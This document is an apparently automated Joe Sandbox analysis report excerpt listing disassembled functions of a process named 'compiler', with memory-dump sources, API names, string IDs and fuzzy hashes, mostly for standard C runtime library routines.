                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD61074 Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 93bbb65e8b4696ea09540599237059226f52ae2612533fc72e8fc8008572ffa8
                                                            • Instruction ID: 62dccbebcd8c919a0082bd2f80663d7f171d6fd2b69e4475ef22a30083df7ee0
                                                            • Opcode Fuzzy Hash: 93bbb65e8b4696ea09540599237059226f52ae2612533fc72e8fc8008572ffa8
                                                            • Instruction Fuzzy Hash: 7FE04F52A16E8581FF54A71EC0483A46250EB6DB48F5C4034CE0C0E358EF3D909A8350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF79D57778F Relevance: .2, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000003.1901916147.00007FF79D572000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF79D572000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_3_7ff79d572000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05d4bd81cee4d6afe337fafba70255171d57d6fddcff4c5dc641f7f3c6d4b4e6
                                                            • Instruction ID: 071daa8d808efca351c1197a6331a4944303d97c541874eedd322a28b62d3fd6
                                                            • Opcode Fuzzy Hash: 05d4bd81cee4d6afe337fafba70255171d57d6fddcff4c5dc641f7f3c6d4b4e6
                                                            • Instruction Fuzzy Hash: 6571B630819A0A8BEBA4EF388544A61F3E0FF14321FE04778DC99D7681EB34B995C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00007FF7BADC3530 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 230stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strchr$CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                            • String ID: PATH$\
                                                            • API String ID: 3048291518-1896636505
                                                            • Opcode ID: c022614985cd1e6d63462c07aade4fad428c27031de9a757191052ca83f36a8e
                                                            • Instruction ID: a3b6c93291ca8fdf56d625c705534374dafa4e1fc15aac19035b5ac28670a71b
                                                            • Opcode Fuzzy Hash: c022614985cd1e6d63462c07aade4fad428c27031de9a757191052ca83f36a8e
                                                            • Instruction Fuzzy Hash: 9881AF61F0C25246FB55BA6D94053B8E2A0EF67B94FC445B5DF0D07BCEEE3CA80182A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC80C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastNameTranslatewcschr$CodePageValid
                                                            • String ID: utf8
                                                            • API String ID: 4034593509-905460609
                                                            • Opcode ID: 08414fbfc6259cf32d0c897cc561d04973275c1c2dc1d9f15555a9c828afff97
                                                            • Instruction ID: 04a2e17d80b473ed3ea2555c1359c9d8163b9caa3574b3857e91e4e4090fd48f
                                                            • Opcode Fuzzy Hash: 08414fbfc6259cf32d0c897cc561d04973275c1c2dc1d9f15555a9c828afff97
                                                            • Instruction Fuzzy Hash: 32918C32B0874295FB24BB2994406BDA3A4EB66B80FC441B1DF5D4769DEF3CE551C3A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC0F48 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                            • String ID: ?
                                                            • API String ID: 435049134-1684325040
                                                            • Opcode ID: d072d0ac003c7fc3833c3c11cb182911db77b20a9a904b2c003c860f0c1f8cc3
                                                            • Instruction ID: ee05801e9226a5abb1fe40696824d1c744f1257a4b115aa699b3f9360cdbd69b
                                                            • Opcode Fuzzy Hash: d072d0ac003c7fc3833c3c11cb182911db77b20a9a904b2c003c860f0c1f8cc3
                                                            • Instruction Fuzzy Hash: A9D1F532A086529AFB10BF29D4412B9AB90FB66794FC44176FF4D4769DEF3CD44183A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB2118 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CurrentHandleProcess$CloseDuplicateFeaturePresentProcessor
                                                            • String ID: /c $COMSPEC$cmd.exe
                                                            • API String ID: 632925573-3246030452
                                                            • Opcode ID: 8d2b322c5374be40a0632b21b4bb372176ec98587ea022fe7186ac17bf430374
                                                            • Instruction ID: ad84f24f3670f37b8f2fa1932686cb4ba3b3b695aebbd2f3141e8d37057612aa
                                                            • Opcode Fuzzy Hash: 8d2b322c5374be40a0632b21b4bb372176ec98587ea022fe7186ac17bf430374
                                                            • Instruction Fuzzy Hash: 7D91B222A0974291FB50BB2994403B9A391FB66B98FC44675EF1D47BDDDE3CD4068320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC2E2C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 175stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2F82
                                                              • Part of subcall function 00007FF7BADC3078: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC30B6
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC2E69
                                                              • Part of subcall function 00007FF7BADB6D18: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADB6D3D
                                                              • Part of subcall function 00007FF7BADBEEA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADBEEC8
                                                              • Part of subcall function 00007FF7BADB76B0: HeapFree.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76C6
                                                              • Part of subcall function 00007FF7BADB76B0: GetLastError.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76D8
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EAE
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EBE
                                                            • strrchr.LIBVCRUNTIME ref: 00007FF7BADC2EE2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfostrrchr$ErrorFreeHeapLast
                                                            • String ID: .com
                                                            • API String ID: 1282697220-4200470757
                                                            • Opcode ID: 157fd3c74ecc408e9b2e6992929adf48258491eb38933be4c0eb02aee2cb33dc
                                                            • Instruction ID: 9a1b3fc396619bf4960b855584a71456c71f269dae029545080f0277d2130675
                                                            • Opcode Fuzzy Hash: 157fd3c74ecc408e9b2e6992929adf48258491eb38933be4c0eb02aee2cb33dc
                                                            • Instruction Fuzzy Hash: 2751A011B0934655FA58BA2E98012BAD285DF66FD0FC845B4EF1D577CEFE3CE40192A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC8AF4 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                            • String ID:
                                                            • API String ID: 3939093798-0
                                                            • Opcode ID: 189152ba568f8f91c13721ed574b7a3044cfb81d2835aac33a6fae3b97058e20
                                                            • Instruction ID: 9b75f044faacbf71c04e8e47da24b853713cebb8efb7e3d3d2d9b7825925f4cd
                                                            • Opcode Fuzzy Hash: 189152ba568f8f91c13721ed574b7a3044cfb81d2835aac33a6fae3b97058e20
                                                            • Instruction Fuzzy Hash: 05716B62F08602A9FB11BB68D450ABDA3A0FB6AB44FC44575CF0D5369DEF3CA445C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADAF128 Relevance: 9.4, APIs: 6, Instructions: 388COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: b7c3cc75e3f1c3569c9e9f0376072b06dee5b5c64c51e86bd6f8809bc1becff1
                                                            • Instruction ID: cce4c179315ba22551d0194351023811906c73d920ffd2d40dfd9408c8e2d582
                                                            • Opcode Fuzzy Hash: b7c3cc75e3f1c3569c9e9f0376072b06dee5b5c64c51e86bd6f8809bc1becff1
                                                            • Instruction Fuzzy Hash: 1C028711A19F8948E523BB3994103B6D254EF7B3D4F908376DF9E367ACDF2CA4468210
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB3530 Relevance: 9.2, APIs: 6, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1405656091-0
                                                            • Opcode ID: 92edb82cc1be356e944d5be2d6ec176ad18619f240dd889176faa2e58333a94f
                                                            • Instruction ID: 9d3d80b106f37b2a315e6dbda278241e4cabdccf1c975de6dbe6a812be4d027d
                                                            • Opcode Fuzzy Hash: 92edb82cc1be356e944d5be2d6ec176ad18619f240dd889176faa2e58333a94f
                                                            • Instruction Fuzzy Hash: 2C91B6B2B043465BFB58BF29C9553A8A695EB65784FC48039EF0D4BB8DEE3CE4018710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB6E5C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 881f1bb6fda31708bf4d9125d1e3796bcd63b967cb69542e85c8baa51a2b9d52
                                                            • Instruction ID: 3ea8547f4a5028c7c4a71bccd5c8be5716bc13cf8f69187b5558bb67cd5eb19f
                                                            • Opcode Fuzzy Hash: 881f1bb6fda31708bf4d9125d1e3796bcd63b967cb69542e85c8baa51a2b9d52
                                                            • Instruction Fuzzy Hash: F031B232608B8195E760AF28E8442AEB3A0FB99754F800175EF8D43B9CDF3CD1558B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBAA1C Relevance: 7.8, APIs: 5, Instructions: 325fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite$Console
                                                            • String ID:
                                                            • API String ID: 786612050-0
                                                            • Opcode ID: ab4586f902e8140729dcd1c5c98fb05767d9e92645ccd8b0000586eaa1fb3355
                                                            • Instruction ID: 4aa2963e450d1c22a14c30523302af705399950386a34969d86334a8cfc3a6ed
                                                            • Opcode Fuzzy Hash: ab4586f902e8140729dcd1c5c98fb05767d9e92645ccd8b0000586eaa1fb3355
                                                            • Instruction Fuzzy Hash: BBE1CD26B08B81AAF710EB68D5441ADB7B1FB56788BC40175DF4E47BADEE38D116C310
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB9408 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: 18db13aa2c0d49f2c14c1396b8196af700ba5367253efba66e15988ae4885015
                                                            • Instruction ID: bc921534538c8de03eb126239376895c895365ad808fc942260a922e6117355a
                                                            • Opcode Fuzzy Hash: 18db13aa2c0d49f2c14c1396b8196af700ba5367253efba66e15988ae4885015
                                                            • Instruction Fuzzy Hash: 41913462B097C596FB11FB2990007ADA7A5EB62B80F858072EF5D4739DEE3DE502C311
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: InfoLocaletry_get_function
                                                            • String ID: GetLocaleInfoEx
                                                            • API String ID: 2200034068-2904428671
                                                            • Opcode ID: f1e2e7eb7cdbe565c1700194fd0c1f00fb76adae4104d43934a0d858aa3f6890
                                                            • Instruction ID: 5d80f035c9f051546b110893318499aa8cc48d8c5fd4290ed24dfcb6e831c4fb
                                                            • Opcode Fuzzy Hash: f1e2e7eb7cdbe565c1700194fd0c1f00fb76adae4104d43934a0d858aa3f6890
                                                            • Instruction Fuzzy Hash: 18018464B09B4192F700BB29A4404A9E360EFA6BC0FD844B5EF4C0776DDE3CD5018750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD581D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID: system error %d
                                                            • API String ID: 3479602957-1688351658
                                                            • Opcode ID: 25473cae2fde5da65a78d259b7bc28183704b3c064eb48962ffd5ce5edeaf330
                                                            • Instruction ID: 1d3bd13e024d7cbbcde83b409f9400137dded756b185fa123d2bb69f44b518cb
                                                            • Opcode Fuzzy Hash: 25473cae2fde5da65a78d259b7bc28183704b3c064eb48962ffd5ce5edeaf330
                                                            • Instruction Fuzzy Hash: 89018421B18A8186FB60BB19F85136AA2A0FBAA780F804175DF4D4765DDF3CD415CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC8574 Relevance: 4.7, APIs: 3, Instructions: 169COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7BADB90F8: GetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB9107
                                                              • Part of subcall function 00007FF7BADB90F8: SetLastError.KERNEL32(?,?,?,00007FF7BADBB43A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333), ref: 00007FF7BADB91A5
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC85E0
                                                              • Part of subcall function 00007FF7BADC71D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC71F8
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC8629
                                                              • Part of subcall function 00007FF7BADC71D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC72AD
                                                            • GetLocaleInfoW.KERNEL32 ref: 00007FF7BADC86F4
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3644580040-0
                                                            • Opcode ID: 658dfeded6e5aa175ae6e8ebbf1bfce093311e49db5d7b15232ccb3f84015926
                                                            • Instruction ID: 022f1d58d183109186e1e6fb2224988a29e3e72357074829d9e0b6476e065e2a
                                                            • Opcode Fuzzy Hash: 658dfeded6e5aa175ae6e8ebbf1bfce093311e49db5d7b15232ccb3f84015926
                                                            • Instruction Fuzzy Hash: BB61BD32B0850296FB24BF19E540AADA3A0FB66741FC44179CF9D936DDEE3CE4518790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB7DD4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2742660187-595813830
                                                            • Opcode ID: 5c29dde3a4007b0d625608c74fbd1a5764cdf17396af20edfffe3ae9ff224be0
                                                            • Instruction ID: b157e7c5c0e4d09bc3a2448dcebbcf35fc00bdffca7620c67cc3dee6fdb40d3f
                                                            • Opcode Fuzzy Hash: 5c29dde3a4007b0d625608c74fbd1a5764cdf17396af20edfffe3ae9ff224be0
                                                            • Instruction Fuzzy Hash: F5E04FA5E0A90691FA05B759A4111B49250DF29704FC808B2DF1C062BDED2C65A5C3A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC412C Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
